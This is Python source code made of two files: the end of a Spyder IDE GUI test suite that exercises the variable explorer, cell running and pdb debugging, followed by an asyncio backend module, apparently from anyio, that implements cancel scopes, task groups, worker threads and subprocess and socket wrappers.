shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.get_focus_widget()
# ---- Run file ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Remove one element
nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0))
nsb.editor.remove_item(force=True)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 3,
timeout=EVAL_TIMEOUT)
def data(cm, i, j):
assert cm.rowCount() == 3
return cm.data(cm.index(i, j))
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'li'
assert data(nsb.editor.model, 2, 0) == 's'
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_refresh(main_window, qtbot):
"""
Test refreshing the variable explorer while the kernel is executing.
"""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
control = main_window.ipyconsole.get_focus_widget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
shell.execute("import time\n"
"for i in range(10):\n"
" print('i = {}'.format(i))\n"
" time.sleep(.1)\n")
qtbot.waitUntil(lambda: "i = 0" in control.toPlainText())
qtbot.wait(300)
# Get value object
nsb = main_window.variableexplorer.get_focus_widget()
# This is empty
assert len(nsb.editor.source_model._data) == 0
nsb.refresh_table()
qtbot.waitUntil(lambda: len(nsb.editor.source_model._data) == 1)
assert 0 < int(nsb.editor.source_model._data['i']['view']) < 9
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_edge_cases(main_window, qtbot, tmpdir):
"""
Test if runcell works with an unnamed cell at the top of the file
and with an empty cell.
"""
# Write code with a cell to a file
code = ('if True:\n'
' a = 1\n'
'#%%')
p = tmpdir.join("test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
code_editor = main_window.editor.get_focus_widget()
# call runcell
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
assert 'runcell(0' in shell._control.toPlainText()
assert 'cell is empty' not in shell._control.toPlainText()
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
assert 'runcell(1' in shell._control.toPlainText()
assert 'Error' not in shell._control.toPlainText()
assert 'cell is empty' in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_pdb(main_window, qtbot):
"""Test the runcell command in pdb."""
# Write code with a cell to a file
code = ("if 'abba' in dir():\n"
" print('abba {}'.format(abba))\n"
"else:\n"
" def foo():\n"
" abba = 27\n"
" foo()\n")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
# Start debugging
qtbot.mouseClick(debug_button, Qt.LeftButton)
for key in ['n', 'n', 's', 'n', 'n']:
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>',
timeout=3000)
qtbot.keyClick(shell._control, key)
qtbot.keyClick(shell._control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
assert shell.get_value('abba') == 27
code_editor.setFocus()
# call runcell
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(lambda: "!runcell" in shell._control.toPlainText())
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
# Make sure the local variables are detected
assert "abba 27" in shell._control.toPlainText()
# --- Path manager
# ----------------------------------------------------------------------------
@pytest.mark.slow
def test_path_manager_updates_clients(qtbot, main_window, tmpdir):
"""Check that on path manager updates, consoles correctly update."""
main_window.show_path_manager()
dlg = main_window._path_manager
test_folder = 'foo-spam-bar-123'
folder = str(tmpdir.mkdir(test_folder))
dlg.add_path(folder)
qtbot.waitUntil(lambda: dlg.button_ok.isEnabled(), timeout=EVAL_TIMEOUT)
with qtbot.waitSignal(dlg.sig_path_changed):
dlg.button_ok.animateClick()
cmd = 'import sys;print(sys.path)'
# Check Spyder is updated
main_window.console.execute_lines(cmd)
syspath = main_window.console.get_sys_path()
assert folder in syspath
# Check clients are updated
count = 0
for client in main_window.ipyconsole.get_clients():
shell = client.shellwidget
if shell is not None:
syspath = shell.execute(cmd)
control = shell._control
# `shell.executed` signal was not working so we use waitUntil
qtbot.waitUntil(lambda: 'In [2]:' in control.toPlainText(),
timeout=EVAL_TIMEOUT)
assert test_folder in control.toPlainText()
count += 1
assert count >= 1
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
reason="It times out on macOS and Windows")
def test_pbd_key_leak(main_window, qtbot, tmpdir):
"""
Check that pdb notify spyder doesn't call
QApplication.processEvents(). If it does there might be keystoke leakage.
see #10834
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = shell._control
# Write code to a file
code1 = ("def a():\n"
" 1/0")
code2 = ("from tmp import a\n"
"a()")
folder = tmpdir.join('tmp_folder')
test_file = folder.join('tmp.py')
test_file.write(code1, ensure=True)
test_file2 = folder.join('tmp2.py')
test_file2.write(code2)
# Run tmp2 and get an error
with qtbot.waitSignal(shell.executed):
shell.execute('runfile("' + str(test_file2).replace("\\", "/") +
'", wdir="' + str(folder).replace("\\", "/") + '")')
assert '1/0' in control.toPlainText()
# Replace QApplication.processEvents to make sure it is not called
super_processEvents = QApplication.processEvents
def processEvents():
processEvents.called = True
return super_processEvents()
processEvents.called = False
try:
QApplication.processEvents = processEvents
# Debug and open both files
shell.execute('%debug')
qtbot.waitUntil(lambda: control.toPlainText().split()[-1] == 'ipdb>')
qtbot.keyClick(control, 'u')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(lambda: control.toPlainText().split()[-1] == 'ipdb>')
# Wait until both files are open
qtbot.waitUntil(
lambda: osp.normpath(str(test_file)) in [
osp.normpath(p) for p in main_window.editor.get_filenames()])
qtbot.waitUntil(
lambda: str(test_file2) in [
osp.normpath(p) for p in main_window.editor.get_filenames()])
# Make sure the events are not processed.
assert not processEvents.called
finally:
QApplication.processEvents = super_processEvents
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It times out on macOS")
def test_pbd_step(main_window, qtbot, tmpdir):
"""
Check that pdb notify Spyder only moves when a new line is reached.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = shell._control
# Write code to a file
code1 = ("def a():\n"
" 1/0")
code2 = ("from tmp import a\n"
"a()")
folder = tmpdir.join('tmp_folder')
test_file = folder.join('tmp.py')
test_file.write(code1, ensure=True)
test_file2 = folder.join('tmp2.py')
test_file2.write(code2)
# Run tmp2 and get an error
with qtbot.waitSignal(shell.executed):
shell.execute('runfile("' + str(test_file2).replace("\\", "/") +
'", wdir="' + str(folder).replace("\\", "/") + '")')
assert '1/0' in control.toPlainText()
# Debug and enter first file
shell.execute('%debug')
qtbot.waitUntil(lambda: control.toPlainText().split()[-1] == 'ipdb>')
qtbot.waitUntil(
lambda: osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file)))
# Go up and enter second file
qtbot.keyClick(control, 'u')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(lambda: control.toPlainText().split()[-1] == 'ipdb>')
qtbot.waitUntil(
lambda: osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file2)))
# Go back to first file
editor_stack = main_window.editor.get_current_editorstack()
index = editor_stack.has_filename(str(test_file))
assert index is not None
editor_stack.set_stack_index(index)
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file))
# Change frame but stay at the same place
qtbot.keyClicks(control, 'test = 0')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(lambda: control.toPlainText().split()[-1] == 'ipdb>')
qtbot.wait(1000)
# Make sure we didn't move
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file))
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_after_restart(main_window, qtbot):
"""Test runcell after a kernel restart."""
# Write code to a file
code = "print('test_runcell_after_restart')"
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
# Restart Kernel
with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000):
shell.ipyclient.restart_kernel()
# call runcell
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(
lambda: "test_runcell_after_restart" in shell._control.toPlainText())
# Make sure no errors are shown
assert "error" not in shell._control.toPlainText().lower()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform.startswith('linux'),
reason="It fails sometimes on Linux")
@pytest.mark.parametrize(
"ipython", [True, False])
@pytest.mark.parametrize(
"test_cell_magic", [True, False])
def test_ipython_magic(main_window, qtbot, tmpdir, ipython, test_cell_magic):
"""Test the runcell command with cell magic."""
# Write code with a cell to a file
write_file = tmpdir.mkdir("foo").join("bar.txt")
assert not osp.exists(to_text_string(write_file))
if test_cell_magic:
code = "\n\n%%writefile " + to_text_string(write_file) + "\ntest\n"
else:
code = "\n\n%debug print()"
if ipython:
fn = "cell-test.ipy"
else:
fn = "cell-test.py"
p = tmpdir.join(fn)
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Execute runcell
with qtbot.waitSignal(shell.executed):
shell.execute("runcell(0, r'{}')".format(to_text_string(p)))
control = main_window.ipyconsole.get_focus_widget()
error_text = 'save this file with the .ipy extension'
try:
if ipython:
if test_cell_magic:
qtbot.waitUntil(
lambda: 'Writing' in control.toPlainText())
# Verify that the code was executed
assert osp.exists(to_text_string(write_file))
else:
qtbot.waitUntil(lambda: 'ipdb>' in control.toPlainText())
assert error_text not in control.toPlainText()
else:
qtbot.waitUntil(lambda: error_text in control.toPlainText())
finally:
if osp.exists(to_text_string(write_file)):
os.remove(to_text_string(write_file))
@pytest.mark.slow
@flaky(max_runs=3)
def test_running_namespace(main_window, qtbot, tmpdir):
"""
Test that the running namespace is correctly sent when debugging in a
new namespace.
"""
code = ("def test(a):\n print('a:',a)\na = 10\ntest(5)")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
code_editor.debugger.toogle_breakpoint(line_number=2)
# Write b in the namespace
with qtbot.waitSignal(shell.executed):
shell.execute('b = 10')
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data)
assert nsb.editor.source_model._data['b']['view'] == '10'
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# b should not be there (running namespace) and the local a should be 5
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data and
nsb.editor.source_model._data['a']['view'] == '5',
timeout=3000)
assert 'b' not in nsb.editor.source_model._data
assert nsb.editor.source_model._data['a']['view'] == '5'
with qtbot.waitSignal(shell.executed):
shell.execute('c')
# At the end, b should be back and a should be 10
qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data)
assert nsb.editor.source_model._data['a']['view'] == '10'
assert nsb.editor.source_model._data['b']['view'] == '10'
@pytest.mark.slow
@flaky(max_runs=3)
def test_post_mortem(main_window, qtbot, tmpdir):
"""Test post mortem works"""
# Check we can use custom complete for pdb
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_focus_widget()
test_file = tmpdir.join('test.py')
test_file.write('raise RuntimeError\n')
with qtbot.waitSignal(shell.executed):
shell.execute(
"runfile(" + repr(str(test_file)) + ", post_mortem=True)")
assert "ipdb>" in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_unsaved_file_multiprocessing(main_window, qtbot):
"""Test that we can run an unsaved file with multiprocessing."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(
"import multiprocessing\n"
"import traceback\n"
'if __name__ is "__main__":\n'
" p = multiprocessing.Process(target=traceback.print_exc)\n"
" p.start()\n"
" p.join()\n"
)
# This code should run even on windows
# Start running
qtbot.mouseClick(run_button, Qt.LeftButton)
# Because multiprocessing is behaving strangly on windows, only some
# situations will work. This is one of these situations so it shouldn't
# be broken.
if os.name == 'nt':
qtbot.waitUntil(
lambda: "Warning: multiprocessing" in shell._control.toPlainText())
else:
# There is no exception, so the exception is None
qtbot.waitUntil(
lambda: 'None' in shell._control.toPlainText())
if __name__ == "__main__":
pytest.main()
|
_asyncio.py
|
import asyncio
import concurrent.futures
import math
import socket
import sys
from collections import OrderedDict, deque
from concurrent.futures import Future
from dataclasses import dataclass
from functools import wraps
from inspect import isgenerator
from socket import AddressFamily, SocketKind, SocketType
from threading import Thread
from types import TracebackType
from typing import (
Callable, Set, Optional, Union, Tuple, cast, Coroutine, Any, Awaitable, TypeVar, Generator,
List, Dict, Sequence, Type, Deque)
from weakref import WeakKeyDictionary
from .. import abc, TaskInfo
from .._core._eventloop import threadlocals, claim_worker_thread
from .._core._exceptions import (
ExceptionGroup as BaseExceptionGroup, ClosedResourceError, BusyResourceError, WouldBlock,
BrokenResourceError, EndOfStream)
from .._core._sockets import GetAddrInfoReturnType, convert_ipv6_sockaddr
from .._core._synchronization import ResourceGuard
from ..abc.sockets import IPSockAddrType, UDPPacketType
if sys.version_info >= (3, 7):
from asyncio import create_task, get_running_loop, current_task, all_tasks, run as native_run
from contextlib import asynccontextmanager
else:
from async_generator import asynccontextmanager
_T = TypeVar('_T')
def native_run(main, *, debug=False):
# Snatched from Python 3.7
from asyncio import coroutines
from asyncio import events
from asyncio import tasks
def _cancel_all_tasks(loop):
to_cancel = all_tasks(loop)
if not to_cancel:
return
for task in to_cancel:
task.cancel()
loop.run_until_complete(
tasks.gather(*to_cancel, loop=loop, return_exceptions=True))
for task in to_cancel:
if task.cancelled():
continue
if task.exception() is not None:
loop.call_exception_handler({
'message': 'unhandled exception during asyncio.run() shutdown',
'exception': task.exception(),
'task': task,
})
if events._get_running_loop() is not None:
raise RuntimeError(
"asyncio.run() cannot be called from a running event loop")
if not coroutines.iscoroutine(main):
raise ValueError("a coroutine was expected, got {!r}".format(main))
loop = events.new_event_loop()
try:
events.set_event_loop(loop)
loop.set_debug(debug)
return loop.run_until_complete(main)
finally:
try:
_cancel_all_tasks(loop)
loop.run_until_complete(loop.shutdown_asyncgens())
finally:
events.set_event_loop(None)
loop.close()
def create_task(coro: Union[Generator[Any, None, _T], Awaitable[_T]], *, # type: ignore
name: Optional[str] = None) -> asyncio.Task:
return get_running_loop().create_task(coro)
def get_running_loop() -> asyncio.AbstractEventLoop:
loop = asyncio._get_running_loop()
if loop is not None:
return loop
else:
raise RuntimeError('no running event loop')
def all_tasks(loop: Optional[asyncio.AbstractEventLoop] = None) -> Set[asyncio.Task]:
"""Return a set of all tasks for the loop."""
from asyncio import Task
if loop is None:
loop = get_running_loop()
return {t for t in Task.all_tasks(loop) if not t.done()}
def current_task(loop: Optional[asyncio.AbstractEventLoop] = None) -> Optional[asyncio.Task]:
if loop is None:
loop = get_running_loop()
return asyncio.Task.current_task(loop)
T_Retval = TypeVar('T_Retval')
# Check whether there is native support for task names in asyncio (3.8+)
_native_task_names = hasattr(asyncio.Task, 'get_name')
def get_callable_name(func: Callable) -> str:
module = getattr(func, '__module__', None)
qualname = getattr(func, '__qualname__', None)
return '.'.join([x for x in (module, qualname) if x])
#
# Event loop
#
def _maybe_set_event_loop_policy(policy: Optional[asyncio.AbstractEventLoopPolicy],
use_uvloop: bool) -> None:
# On CPython, use uvloop when possible if no other policy has been given and if not
# explicitly disabled
if policy is None and use_uvloop and sys.implementation.name == 'cpython':
try:
import uvloop
except ImportError:
pass
else:
# Test for missing shutdown_default_executor() (uvloop 0.14.0 and earlier)
if (not hasattr(asyncio.AbstractEventLoop, 'shutdown_default_executor')
or hasattr(uvloop.loop.Loop, 'shutdown_default_executor')):
policy = uvloop.EventLoopPolicy()
if policy is not None:
asyncio.set_event_loop_policy(policy)
def run(func: Callable[..., T_Retval], *args, debug: bool = False, use_uvloop: bool = True,
policy: Optional[asyncio.AbstractEventLoopPolicy] = None) -> T_Retval:
@wraps(func)
async def wrapper():
task = current_task()
task_state = TaskState(None, get_callable_name(func), None)
_task_states[task] = task_state
if _native_task_names:
task.set_name(task_state.name)
try:
return await func(*args)
finally:
del _task_states[task]
_maybe_set_event_loop_policy(policy, use_uvloop)
return native_run(wrapper(), debug=debug)
#
# Miscellaneous
#
async def sleep(delay: float) -> None:
await checkpoint()
await asyncio.sleep(delay)
#
# Timeouts and cancellation
#
CancelledError = asyncio.CancelledError
class CancelScope(abc.CancelScope):
__slots__ = ('_deadline', '_shield', '_parent_scope', '_cancel_called', '_active',
'_timeout_task', '_tasks', '_host_task', '_timeout_expired')
def __init__(self, deadline: float = math.inf, shield: bool = False):
self._deadline = deadline
self._shield = shield
self._parent_scope: Optional[CancelScope] = None
self._cancel_called = False
self._active = False
self._timeout_task: Optional[asyncio.Task] = None
self._tasks: Set[asyncio.Task] = set()
self._host_task: Optional[asyncio.Task] = None
self._timeout_expired = False
async def __aenter__(self):
async def timeout():
await asyncio.sleep(self._deadline - get_running_loop().time())
self._timeout_expired = True
await self.cancel()
if self._active:
raise RuntimeError(
"Each CancelScope may only be used for a single 'async with' block"
)
self._host_task = current_task()
self._tasks.add(self._host_task)
try:
task_state = _task_states[self._host_task]
except KeyError:
task_name = self._host_task.get_name() if _native_task_names else None
task_state = TaskState(None, task_name, self)
_task_states[self._host_task] = task_state
else:
self._parent_scope = task_state.cancel_scope
task_state.cancel_scope = self
if self._deadline != math.inf:
if get_running_loop().time() >= self._deadline:
self._cancel_called = True
self._timeout_expired = True
else:
self._timeout_task = get_running_loop().create_task(timeout())
self._active = True
return self
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> Optional[bool]:
self._active = False
if self._timeout_task:
self._timeout_task.cancel()
assert self._host_task is not None
self._tasks.remove(self._host_task)
host_task_state = _task_states.get(self._host_task)
if host_task_state is not None and host_task_state.cancel_scope is self:
host_task_state.cancel_scope = self._parent_scope
if exc_val is not None:
exceptions = exc_val.exceptions if isinstance(exc_val, ExceptionGroup) else [exc_val]
if all(isinstance(exc, CancelledError) for exc in exceptions):
if self._timeout_expired:
return True
elif not self._parent_cancelled():
# This scope was directly cancelled
return True
return None
async def _cancel(self):
# Deliver cancellation to directly contained tasks and nested cancel scopes
for task in self._tasks:
# Cancel the task directly, but only if it's blocked and isn't within a shielded scope
cancel_scope = _task_states[task].cancel_scope
if cancel_scope is self:
# Only deliver the cancellation if the task is already running (but not this task!)
try:
running = task._coro.cr_running
awaitable = task._coro.cr_await
except AttributeError:
running = task._coro.gi_running
awaitable = task._coro.gi_yieldfrom
if not running and awaitable is not None:
task.cancel()
elif not cancel_scope._shielded_to(self):
await cancel_scope._cancel()
def _shielded_to(self, parent: Optional['CancelScope']) -> bool:
# Check whether this task or any parent up to (but not including) the "parent" argument is
# shielded
cancel_scope: Optional[CancelScope] = self
while cancel_scope is not None and cancel_scope is not parent:
if cancel_scope._shield:
return True
else:
cancel_scope = cancel_scope._parent_scope
return False
def _parent_cancelled(self) -> bool:
# Check whether any parent has been cancelled
cancel_scope = self._parent_scope
while cancel_scope is not None and not cancel_scope._shield:
if cancel_scope._cancel_called:
return True
else:
cancel_scope = cancel_scope._parent_scope
return False
async def cancel(self) -> None:
if self._cancel_called:
return
self._cancel_called = True
await self._cancel()
@property
def deadline(self) -> float:
return self._deadline
@property
def cancel_called(self) -> bool:
return self._cancel_called
@property
def shield(self) -> bool:
return self._shield
async def checkpoint():
try:
cancel_scope = _task_states[current_task()].cancel_scope
except KeyError:
cancel_scope = None
while cancel_scope:
if cancel_scope.cancel_called:
raise CancelledError
elif cancel_scope.shield:
break
else:
cancel_scope = cancel_scope._parent_scope
await asyncio.sleep(0)
@asynccontextmanager
async def fail_after(delay: float, shield: bool):
deadline = get_running_loop().time() + delay
async with CancelScope(deadline, shield) as scope:
yield scope
if scope._timeout_expired:
raise TimeoutError
@asynccontextmanager
async def move_on_after(delay: float, shield: bool):
deadline = get_running_loop().time() + delay
async with CancelScope(deadline=deadline, shield=shield) as scope:
yield scope
async def current_effective_deadline():
deadline = math.inf
cancel_scope = _task_states[current_task()].cancel_scope
while cancel_scope:
deadline = min(deadline, cancel_scope.deadline)
if cancel_scope.shield:
break
else:
cancel_scope = cancel_scope._parent_scope
return deadline
async def current_time():
return get_running_loop().time()
#
# Task states
#
class TaskState:
"""
Encapsulates auxiliary task information that cannot be added to the Task instance itself
because there are no guarantees about its implementation.
"""
__slots__ = 'parent_id', 'name', 'cancel_scope'
def __init__(self, parent_id: Optional[int], name: Optional[str],
cancel_scope: Optional[CancelScope]):
self.parent_id = parent_id
self.name = name
self.cancel_scope = cancel_scope
_task_states = WeakKeyDictionary() # type: WeakKeyDictionary[asyncio.Task, TaskState]
#
# Task groups
#
class ExceptionGroup(BaseExceptionGroup):
def __init__(self, exceptions: Sequence[BaseException]):
super().__init__()
self.exceptions = exceptions
class TaskGroup(abc.TaskGroup):
__slots__ = 'cancel_scope', '_active', '_exceptions'
def __init__(self):
self.cancel_scope: CancelScope = CancelScope()
self._active = False
self._exceptions: List[BaseException] = []
async def __aenter__(self):
await self.cancel_scope.__aenter__()
self._active = True
return self
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> Optional[bool]:
ignore_exception = await self.cancel_scope.__aexit__(exc_type, exc_val, exc_tb)
if exc_val is not None:
await self.cancel_scope.cancel()
if not ignore_exception:
self._exceptions.append(exc_val)
while self.cancel_scope._tasks:
try:
await asyncio.wait(self.cancel_scope._tasks)
except asyncio.CancelledError:
await self.cancel_scope.cancel()
self._active = False
if not self.cancel_scope._parent_cancelled():
exceptions = self._filter_cancellation_errors(self._exceptions)
else:
exceptions = self._exceptions
try:
if len(exceptions) > 1:
raise ExceptionGroup(exceptions)
elif exceptions and exceptions[0] is not exc_val:
raise exceptions[0]
except BaseException as exc:
# Clear the context here, as it can only be done in-flight.
# If the context is not cleared, it can result in recursive tracebacks (see #145).
exc.__context__ = None
raise
return ignore_exception
@staticmethod
def _filter_cancellation_errors(exceptions: Sequence[BaseException]) -> List[BaseException]:
filtered_exceptions: List[BaseException] = []
for exc in exceptions:
if isinstance(exc, ExceptionGroup):
exc.exceptions = TaskGroup._filter_cancellation_errors(exc.exceptions)
if exc.exceptions:
if len(exc.exceptions) > 1:
filtered_exceptions.append(exc)
else:
filtered_exceptions.append(exc.exceptions[0])
elif not isinstance(exc, CancelledError):
filtered_exceptions.append(exc)
return filtered_exceptions
async def _run_wrapped_task(self, func: Callable[..., Coroutine], args: tuple) -> None:
task = cast(asyncio.Task, current_task())
try:
await func(*args)
except BaseException as exc:
self._exceptions.append(exc)
await self.cancel_scope.cancel()
finally:
self.cancel_scope._tasks.remove(task)
del _task_states[task] # type: ignore
async def spawn(self, func: Callable[..., Coroutine], *args, name=None) -> None:
if not self._active:
raise RuntimeError('This task group is not active; no new tasks can be spawned.')
name = name or get_callable_name(func)
if _native_task_names is None:
task = create_task(self._run_wrapped_task(func, args), name=name) # type: ignore
else:
task = create_task(self._run_wrapped_task(func, args))
# Make the spawned task inherit the task group's cancel scope
_task_states[task] = TaskState(parent_id=id(current_task()), name=name,
cancel_scope=self.cancel_scope)
self.cancel_scope._tasks.add(task)
#
# Threads
#
_Retval_Queue_Type = Tuple[Optional[T_Retval], Optional[BaseException]]
async def run_sync_in_worker_thread(
func: Callable[..., T_Retval], *args, cancellable: bool = False,
limiter: Optional['CapacityLimiter'] = None) -> T_Retval:
def thread_worker():
try:
with claim_worker_thread('asyncio'):
threadlocals.loop = loop
result = func(*args)
except BaseException as exc:
if not loop.is_closed():
asyncio.run_coroutine_threadsafe(limiter.release_on_behalf_of(task), loop)
if not cancelled:
loop.call_soon_threadsafe(queue.put_nowait, (None, exc))
else:
if not loop.is_closed():
asyncio.run_coroutine_threadsafe(limiter.release_on_behalf_of(task), loop)
if not cancelled:
loop.call_soon_threadsafe(queue.put_nowait, (result, None))
await checkpoint()
loop = get_running_loop()
task = current_task()
queue: asyncio.Queue[_Retval_Queue_Type] = asyncio.Queue(1)
cancelled = False
limiter = limiter or _default_thread_limiter
await limiter.acquire_on_behalf_of(task)
thread = Thread(target=thread_worker, daemon=True)
thread.start()
async with CancelScope(shield=not cancellable):
try:
retval, exception = await queue.get()
finally:
cancelled = True
if exception is not None:
raise exception
else:
return cast(T_Retval, retval)
def run_async_from_thread(func: Callable[..., Coroutine[Any, Any, T_Retval]], *args) -> T_Retval:
f: concurrent.futures.Future[T_Retval] = asyncio.run_coroutine_threadsafe(
func(*args), threadlocals.loop)
return f.result()
class BlockingPortal(abc.BlockingPortal):
__slots__ = '_loop'
def __init__(self):
super().__init__()
self._loop = get_running_loop()
def _spawn_task_from_thread(self, func: Callable, args: tuple, future: Future) -> None:
asyncio.run_coroutine_threadsafe(
self._task_group.spawn(self._call_func, func, args, future), self._loop)
#
# Subprocesses
#
@dataclass
class StreamReaderWrapper(abc.ByteReceiveStream):
_stream: asyncio.StreamReader
async def receive(self, max_bytes: int = 65536) -> bytes:
data = await self._stream.read(max_bytes)
if data:
return data
else:
raise EndOfStream
async def aclose(self) -> None:
self._stream.feed_eof()
@dataclass
class StreamWriterWrapper(abc.ByteSendStream):
_stream: asyncio.StreamWriter
async def send(self, item: bytes) -> None:
self._stream.write(item)
await self._stream.drain()
async def aclose(self) -> None:
self._stream.close()
@dataclass
class Process(abc.Process):
_process: asyncio.subprocess.Process
_stdin: Optional[abc.ByteSendStream]
_stdout: Optional[abc.ByteReceiveStream]
_stderr: Optional[abc.ByteReceiveStream]
async def aclose(self) -> None:
if self._stdin:
await self._stdin.aclose()
if self._stdout:
await self._stdout.aclose()
if self._stderr:
await self._stderr.aclose()
await self.wait()
async def wait(self) -> int:
return await self._process.wait()
def terminate(self) -> None:
self._process.terminate()
def kill(self) -> None:
self._process.kill()
def send_signal(self, signal: int) -> None:
self._process.send_signal(signal)
@property
def pid(self) -> int:
return self._process.pid
@property
def returncode(self) -> Optional[int]:
return self._process.returncode
@property
def stdin(self) -> Optional[abc.ByteSendStream]:
return self._stdin
@property
def stdout(self) -> Optional[abc.ByteReceiveStream]:
return self._stdout
@property
def stderr(self) -> Optional[abc.ByteReceiveStream]:
return self._stderr
async def open_process(command, *, shell: bool, stdin: int, stdout: int, stderr: int):
await checkpoint()
if shell:
process = await asyncio.create_subprocess_shell(command, stdin=stdin, stdout=stdout,
stderr=stderr)
else:
process = await asyncio.create_subprocess_exec(*command, stdin=stdin, stdout=stdout,
stderr=stderr)
stdin_stream = StreamWriterWrapper(process.stdin) if process.stdin else None
stdout_stream = StreamReaderWrapper(process.stdout) if process.stdout else None
stderr_stream = StreamReaderWrapper(process.stderr) if process.stderr else None
return Process(process, stdin_stream, stdout_stream, stderr_stream)
#
# Sockets and networking
#
_read_events: Dict[socket.SocketType, asyncio.Event] = {}
_write_events: Dict[socket.SocketType, asyncio.Event] = {}
class StreamProtocol(asyncio.Protocol):
read_queue: Deque[bytes]
read_event: asyncio.Event
write_event: asyncio.Event
exception: Optional[Exception] = None
def connection_made(self, transport: asyncio.BaseTransport) -> None:
self.read_queue = deque()
self.read_event = asyncio.Event()
self.write_event = asyncio.Event()
self.write_event.set()
cast(asyncio.Transport, transport).set_write_buffer_limits(0)
def connection_lost(self, exc: Optional[Exception]) -> None:
self.exception = exc
self.read_event.set()
self.write_event.set()
